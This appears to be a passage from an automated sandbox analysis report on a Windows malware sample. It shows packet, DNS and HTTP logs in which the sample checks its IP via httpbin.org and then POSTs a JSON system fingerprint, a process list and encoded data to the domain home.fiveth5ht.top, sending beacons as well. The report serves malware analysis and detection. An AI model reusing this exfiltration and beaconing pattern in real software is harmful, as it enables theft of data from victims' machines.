                                    Dec 27, 2024 08:47:50.244118929 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244204998 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244214058 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244290113 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244301081 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244487047 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244498968 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244508028 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244607925 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244618893 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244628906 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244898081 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244906902 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244915962 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244925976 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244935036 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244945049 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245157003 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245165110 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245174885 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245183945 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245193005 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245203018 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245212078 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245222092 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245341063 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245357990 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362673998 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362689018 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362782001 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362792015 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362895012 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362903118 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363053083 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363063097 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363207102 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363215923 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363332033 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363342047 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363488913 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363497019 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363619089 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363626957 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363743067 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363751888 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363922119 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363931894 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364006042 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364015102 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364110947 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364120007 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364231110 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364240885 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364331961 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364464998 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364474058 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364485979 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364648104 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364659071 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364768982 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364777088 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.370323896 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:52.431143045 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:52.431356907 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:52.431401968 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:52.431512117 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:52.550992966 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:52.665671110 CET4972180192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:52.785166025 CET80497215.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:52.785346031 CET4972180192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:52.785656929 CET4972180192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:52.905077934 CET80497215.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:54.305116892 CET80497215.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:54.305198908 CET80497215.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:54.305248976 CET4972180192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:54.305583000 CET4972180192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:54.425050020 CET80497215.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:54.514311075 CET4972780192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:54.633933067 CET80497275.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:54.634314060 CET4972780192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:54.635361910 CET4972780192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:54.754952908 CET80497275.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:56.204541922 CET80497275.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:56.204641104 CET80497275.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:56.204713106 CET4972780192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:56.205023050 CET4972780192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:56.324414015 CET80497275.101.3.217192.168.2.11

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 27, 2024 08:47:44.176150084 CET5620453192.168.2.111.1.1.1
                                    Dec 27, 2024 08:47:44.176246881 CET5620453192.168.2.111.1.1.1
                                    Dec 27, 2024 08:47:44.328953981 CET53562041.1.1.1192.168.2.11
                                    Dec 27, 2024 08:47:44.475444078 CET53562041.1.1.1192.168.2.11
                                    Dec 27, 2024 08:47:48.442183018 CET5495753192.168.2.111.1.1.1
                                    Dec 27, 2024 08:47:48.442255974 CET5495753192.168.2.111.1.1.1
                                    Dec 27, 2024 08:47:48.583337069 CET53549571.1.1.1192.168.2.11
                                    Dec 27, 2024 08:47:48.583523035 CET53549571.1.1.1192.168.2.11
                                    Dec 27, 2024 08:47:52.527261972 CET5495953192.168.2.111.1.1.1
                                    Dec 27, 2024 08:47:52.527326107 CET5495953192.168.2.111.1.1.1
                                    Dec 27, 2024 08:47:52.664468050 CET53549591.1.1.1192.168.2.11
                                    Dec 27, 2024 08:47:52.664486885 CET53549591.1.1.1192.168.2.11
                                    Dec 27, 2024 08:47:54.372951984 CET5496153192.168.2.111.1.1.1
                                    Dec 27, 2024 08:47:54.373084068 CET5496153192.168.2.111.1.1.1
                                    Dec 27, 2024 08:47:54.509681940 CET53549611.1.1.1192.168.2.11
                                    Dec 27, 2024 08:47:54.510354042 CET53549611.1.1.1192.168.2.11

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 27, 2024 08:47:44.176150084 CET192.168.2.111.1.1.10x9aa6Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                    Dec 27, 2024 08:47:44.176246881 CET192.168.2.111.1.1.10xf37bStandard query (0)httpbin.org28IN (0x0001)false
                                    Dec 27, 2024 08:47:48.442183018 CET192.168.2.111.1.1.10x23f8Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                    Dec 27, 2024 08:47:48.442255974 CET192.168.2.111.1.1.10xce91Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                    Dec 27, 2024 08:47:52.527261972 CET192.168.2.111.1.1.10x99a6Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                    Dec 27, 2024 08:47:52.527326107 CET192.168.2.111.1.1.10x396aStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                    Dec 27, 2024 08:47:54.372951984 CET192.168.2.111.1.1.10x9e68Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                    Dec 27, 2024 08:47:54.373084068 CET192.168.2.111.1.1.10xb932Standard query (0)home.fiveth5ht.top28IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 27, 2024 08:47:44.475444078 CET1.1.1.1192.168.2.110x9aa6No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                    Dec 27, 2024 08:47:44.475444078 CET1.1.1.1192.168.2.110x9aa6No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                    Dec 27, 2024 08:47:48.583523035 CET1.1.1.1192.168.2.110x23f8No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                    Dec 27, 2024 08:47:52.664468050 CET1.1.1.1192.168.2.110x99a6No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                    Dec 27, 2024 08:47:54.509681940 CET1.1.1.1192.168.2.110x9e68No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • httpbin.org
                                    • home.fiveth5ht.top

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.11497105.101.3.217802028C:\Users\user\Desktop\xXe4fTmV2h.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 27, 2024 08:47:48.713882923 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                    Host: home.fiveth5ht.top
                                    Accept: */*
                                    Content-Type: application/json
                                    Content-Length: 500771
                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 37 33 33 31 37 38 38 37 34 33 35 33 31 34 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "8467331788743531425", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 764 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": 856 }, { "name": "svchost.exe", "pid": 916 }, { "name": "dwm.exe", "pid": 980 }, { "name": "svchost.exe", "pid": 352 }, { "name": "svchost.exe", "pid": 476 }, { "name": "svchost.exe", "pid": 660 }, { "name": "svchost.exe" [TRUNCATED]
                                    Dec 27, 2024 08:47:48.833542109 CET2472OUTData Raw: 5a 71 39 70 35 47 72 36 52 59 58 4c 4e 59 33 39 73 38 79 51 74 62 54 4e 4a 61 7a 7a 77 79 66 30 72 66 38 4f 72 50 32 43 6a 31 2b 41 79 6e 5c 2f 75 70 76 78 6a 5c 2f 2b 65 46 58 38 73 2b 4c 58 30 70 73 67 38 4a 75 4d 4b 33 42 2b 50 34 56 7a 6a 4e
                                    Data Ascii: Zq9p5Gr6RYXLNY39s8yQtbTNJazzwyf0rf8OrP2Cj1+Ayn\/upvxj\/+eFX8s+LX0psg8JuMK3B+P4VzjN8TQwGBx88Zg8ZgsPQccdCVSFOMKylUbhGK5pPlTk7JWXM\/7K8EfodcTeNPA1HjnLOMciyTCYjM8wy2GBx2BzDE4lSy6pCnUqyqYdxpKNSU3yRV2lFNu8rR\/jXor+yf\/h1X+wT\/ANEGT\/w5nxi\/+eFXw5+1t
                                    Dec 27, 2024 08:47:48.833581924 CET2472OUTData Raw: 72 4e 73 2b 5c 2f 5c 2f 58 5c 2f 50 30 4e 4d 38 7a 35 66 6e 54 35 5c 2f 4e 38 72 37 50 4a 4c 2b 6e 36 30 5c 2f 6e 5c 2f 57 48 74 5c 2f 48 47 50 39 64 5c 2f 6e 2b 6c 45 6a 66 63 54 5c 2f 41 45 64 45 38 33 7a 66 4d 6b 6c 36 44 5c 2f 50 34 31 79 6d
                                    Data Ascii: rNs+\/\/X\/P0NM8z5fnT5\/N8r7PJL+n60\/n\/WHt\/HGP9d\/n+lEjfcT\/AEdE83zfMkl6D\/P41ymsNvn+iGM38H7tJv8AnnH\/AJ9T3\/pUMn\/LYfu0\/e9\/3\/k\/+SP\/ANfHX1p\/m\/8AA\/8App5nX+fX6HOKGjRvv\/c9f89+P85oN6fX5fqVvMdV+XBPT952\/wA\/5HWmeZ5m8bPLfn93\/wAsPz\/z9fWz
                                    Dec 27, 2024 08:47:48.833596945 CET2472OUTData Raw: 43 45 63 65 66 64 65 4a 62 53 57 58 47 34 57 6b 5a 4f 77 63 71 2b 6c 65 45 74 49 41 62 78 44 34 77 67 75 62 67 42 43 32 6b 65 44 62 4d 2b 49 72 75 4b 54 4f 35 6f 4c 7a 57 4c 6d 66 53 66 44 4d 55 62 4a 68 56 76 64 46 31 62 78 4c 35 55 6a 5c 2f 4e
                                    Data Ascii: CEcefdeJbSWXG4WkZOwcq+leEtIAbxD4wgubgBC2keDbM+IruKTO5oLzWLmfSfDMUbJhVvdF1bxL5Uj\/NZvsZT3Pw0+Jmn\/F74Kaf4+023ntI9a0K5F5bTQTwpbavZRtZa1aWkk6qbyzstWgvLOC9j3R3AtywIYOq\/ONfkWY5zxJlVStlOKqrDYzBVq2FxLnhqP1ujiMNUdGrSk+V4a0ZxktMNz8ybVRqyP2jLOG+Ec5p4fO
                                    Dec 27, 2024 08:47:48.833620071 CET2472OUTData Raw: 73 54 44 78 36 34 50 77 32 43 78 57 49 77 2b 48 7a 44 44 63 52 59 58 4d 61 4e 48 46 77 64 48 48 59 52 63 4a 35 33 6d 56 44 44 34 71 6e 68 38 52 55 6a 57 6f 30 38 62 67 73 4a 69 36 63 4b 30 65 54 36 78 68 71 4e 61 6c 7a 53 70 78 6d 76 6d 50 70 5a
                                    Data Ascii: sTDx64Pw2CxWIw+HzDDcRYXMaNHFwdHHYRcJ53mVDD4qnh8RUjWo08bgsJi6cK0eT6xhqNalzSpxmvmPpZ8UcP8e\/Ry8UZwyij9d4Sn4dZngsRis04IzuvgcVn\/ABVkmGVfBPhfibiPFZZX\/szE4\/AVq+Op5dTx+HxddZXVzLByxFaH440UUV\/s6f4kEL\/eP4fyFNqTy\/f9P\/r1HQdBH+yt+3wv7Mfx88DfG5PhS3jh
                                    Dec 27, 2024 08:47:48.833704948 CET2472OUTData Raw: 39 73 66 35 5c 2f 4c 50 70 55 51 33 5c 2f 77 41 65 66 62 50 2b 63 65 6e 53 72 45 76 38 58 34 66 30 71 50 79 5c 2f 66 39 50 5c 2f 41 4b 39 42 74 54 36 5c 2f 4c 39 53 4f 6f 47 37 37 50 38 5c 2f 35 39 2b 5c 2f 74 56 6c 6c 32 2b 34 71 47 54 74 2b 50
                                    Data Ascii: 9sf5\/LPpUQ3\/wAefbP+cenSrEv8X4f0qPy\/f9P\/AK9BtT6\/L9SOoG77P8\/59+\/tVll2+4qGTt+P9KDsKHz\/AD8ff69Og\/z7c0u7\/ln2\/wDrfSrPl87\/AP8AX16\/TPb19qqyR\/L\/AKz685\/z\/kUGlPr8v1DzP\/tvbqfx\/l0\/GoZG8zrn\/Wf59fehui\/9cv6CmfO3t+n\/ANeg0Fk3Z3bNn\/bLH+fW
                                    Dec 27, 2024 08:47:48.833717108 CET2472OUTData Raw: 37 5c 2f 33 6f 69 38 7a 70 42 5c 2f 6e 70 5c 2f 6e 6d 6e 37 58 2b 54 5c 2f 56 5c 2f 36 33 5c 2f 50 66 5c 2f 50 54 6e 4e 4d 6b 6a 5c 2f 6a 32 62 50 2b 6d 68 6c 38 5c 2f 48 58 31 5c 2f 48 5c 2f 77 44 58 52 37 58 7a 6c 5c 2f 58 7a 41 5a 74 53 4f 54
                                    Data Ascii: 7\/3oi8zpB\/np\/nmn7X+T\/V\/63\/Pf\/PTnNMkj\/j2bP+mhl8\/HX1\/H\/wDXR7Xzl\/XzAZtSOTenzj\/Wy\/8ATb9P6479aXd+7cJ5m+OL+CL6\/wCf6806P+5vjTzIv9Z\/ywh7\/wCf5imeZ+8375Pz7\/z69qo6CGSPytjplE\/9E4+vp9OKHkRvnRIkeP8Adf639xN\/T680\/d80bov\/ACyuOPKP+GaZtf5PL
                                    Dec 27, 2024 08:47:48.833863974 CET2472OUTData Raw: 4d 36 58 72 65 6a 65 58 72 56 72 34 70 38 5a 36 6c 63 32 53 32 65 76 36 5a 70 64 39 49 49 62 4c 56 74 4f 6c 4e 79 6c 73 62 56 7a 63 47 4f 4f 5a 35 49 5a 6c 54 5c 2f 53 6a 39 6c 72 34 50 66 53 41 38 4d 5c 2f 70 4f 55 38 78 34 79 38 4b 66 47 48 67
                                    Data Ascii: M6XrejeXrVr4p8Z6lc2S2ev6Zpd9IIbLVtOlNylsbVzcGOOZ5IZlT\/Sj9lr4PfSA8M\/pOU8x4y8KfGHgHhHM+BuKMvzfMOJ+BOM+F+HcZWjHBYrK8HmGLzbKsDl1assbRjWwFGvUlUVeDlQjzcx\/nH+0l8VvA\/xD+jtVwHCXiX4U8b8U5fxnw3jsqwPDvGnCXEefYSi5YrDZlisDhcrzPGZhSpPCVpUsZVo01TdGfLWfLyn
                                    Dec 27, 2024 08:47:48.833884001 CET2472OUTData Raw: 35 63 38 58 76 47 6e 44 38 56 38 56 34 44 4f 50 44 39 5a 78 6b 47 56 59 58 68 54 4b 4f 48 71 75 47 7a 54 42 35 58 54 78 45 35 35 54 6d 4f 64 34 75 67 36 64 4f 6a 69 63 31 6f 78 77 39 4b 68 6d 73 4b 64 4a 71 76 43 70 4b 55 61 69 6e 54 55 56 54 62
                                    Data Ascii: 5c8XvGnD8V8V4DOPD9ZxkGVYXhTKOHquGzTB5XTxE55TmOd4ug6dOjic1oxw9KhmsKdJqvCpKUainTUVTb\/pPw\/wDDmtkORYrL+K\/7PzXHV89x+bU62Cr4ydKMcdhMsoVFKdWhgajrTq4BzmvZSik4cs23JL8cP2vPgnefAj\/gmf8AtH+EL3Tf2eNLl1LxX4B8Rrb\/ALNH7PMv7NPgR47z4l\/B\/SxNq3gWX4pfFxtW8W
                                    Dec 27, 2024 08:47:48.833913088 CET4944OUTData Raw: 59 57 57 4e 39 6d 65 76 38 41 6e 5c 2f 50 36 39 7a 79 35 46 6a 54 65 6b 6b 79 66 36 33 33 7a 36 39 66 54 5c 2f 4a 37 35 2b 7a 38 5c 2f 77 5c 2f 34 4a 66 4f 5c 2f 4c 2b 76 6d 51 79 4d 37 46 33 64 39 67 5c 2f 77 42 58 5c 2f 71 72 62 50 2b 66 30 5c
                                    Data Ascii: YWWN9mev8An\/P69zy5FjTekkyf633z69fT\/J75+z8\/w\/4JfO\/L+vmQyM7F3d9g\/wBX\/qrbP+f0\/qzbu3u6eS8n+fp3xz\/SnpGNr\/uY9mP4\/pxa\/wDX93pkmfMf\/wBp\/uIPT6+\/WszUZHs8w787\/wDVS\/8AyV+H9KYJC3zo+X\/55\/8ATvj0z16U\/cnzo7\/JL9n\/AOWv\/k1\/TrUPzrv2J5f7v\/Vx
                                    Dec 27, 2024 08:47:48.953525066 CET2472OUTData Raw: 6a 38 54 6c 65 4c 6e 54 53 6c 4c 6d 68 51 7a 44 42 59 72 43 53 6b 76 64 64 61 68 55 55 57 31 47 34 55 31 5c 2f 75 6e 38 50 35 69 6f 4c 32 36 6a 73 62 4f 37 76 5a 75 49 62 4f 32 6e 75 70 54 6e 48 37 75 33 69 65 56 2b 54 77 50 6c 51 38 6e 70 57 70
                                    Data Ascii: j8TleLnTSlLmhQzDBYrCSkvddahUUW1G4U1\/un8P5ioL26jsbO7vZuIbO2nupTnH7u3ieV+TwPlQ8npWp8TdM1H4RW3wpvfGEuhzWXxq+D3hb40eAbrw5ql1qiXuheLNPsNVtPDd\/HfaVo1xbeNNNsNZ0G51fSLKHUrGKLXtIk0\/VtSjutyXmfEmRZNjspyzNM0wmBx+e1sRh8owuIm4Vcwr4XDVcZiKWHVmpTpYWjVrSi2m
                                    Dec 27, 2024 08:47:52.431143045 CET157INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Fri, 27 Dec 2024 07:47:52 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 1
                                    Connection: close
                                    Data Raw: 30
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.11497215.101.3.217802028C:\Users\user\Desktop\xXe4fTmV2h.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 27, 2024 08:47:52.785656929 CET98OUTGET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                    Host: home.fiveth5ht.top
                                    Accept: */*
                                    Dec 27, 2024 08:47:54.305116892 CET372INHTTP/1.1 404 NOT FOUND
                                    Server: nginx/1.22.1
                                    Date: Fri, 27 Dec 2024 07:47:54 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 207
                                    Connection: close
                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.11497275.101.3.217802028C:\Users\user\Desktop\xXe4fTmV2h.exe
                                    TimestampBytes transferredDirectionData
                                    Dec 27, 2024 08:47:54.635361910 CET171OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                    Host: home.fiveth5ht.top
                                    Accept: */*
                                    Content-Type: application/json
                                    Content-Length: 31
                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                    Data Ascii: { "id1": "0", "data": "Done1" }
                                    Dec 27, 2024 08:47:56.204541922 CET372INHTTP/1.1 404 NOT FOUND
                                    Server: nginx/1.22.1
                                    Date: Fri, 27 Dec 2024 07:47:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 207
                                    Connection: close
                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.11497083.218.7.1034432028C:\Users\user\Desktop\xXe4fTmV2h.exe
                                    TimestampBytes transferredDirectionData
                                    2024-12-27 07:47:46 UTC52OUTGET /ip HTTP/1.1
                                    Host: httpbin.org
                                    Accept: */*
                                    2024-12-27 07:47:46 UTC224INHTTP/1.1 200 OK
                                    Date: Fri, 27 Dec 2024 07:47:46 GMT
                                    Content-Type: application/json
                                    Content-Length: 31
                                    Connection: close
                                    Server: gunicorn/19.9.0
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: true
                                    2024-12-27 07:47:46 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                    Data Ascii: { "origin": "8.46.123.189"}


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    System Behavior

                                    General

                                    Target ID:5
                                    Start time:02:47:40
                                    Start date:27/12/2024
                                    Path:C:\Users\user\Desktop\xXe4fTmV2h.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\xXe4fTmV2h.exe"
                                    Imagebase:0xc00000
                                    File size:4'450'816 bytes
                                    MD5 hash:764767D6ADF6FA8A9C0B437D79A7A973
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:1.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:16.9%
                                      Total number of Nodes:302
                                      Total number of Limit Nodes:51
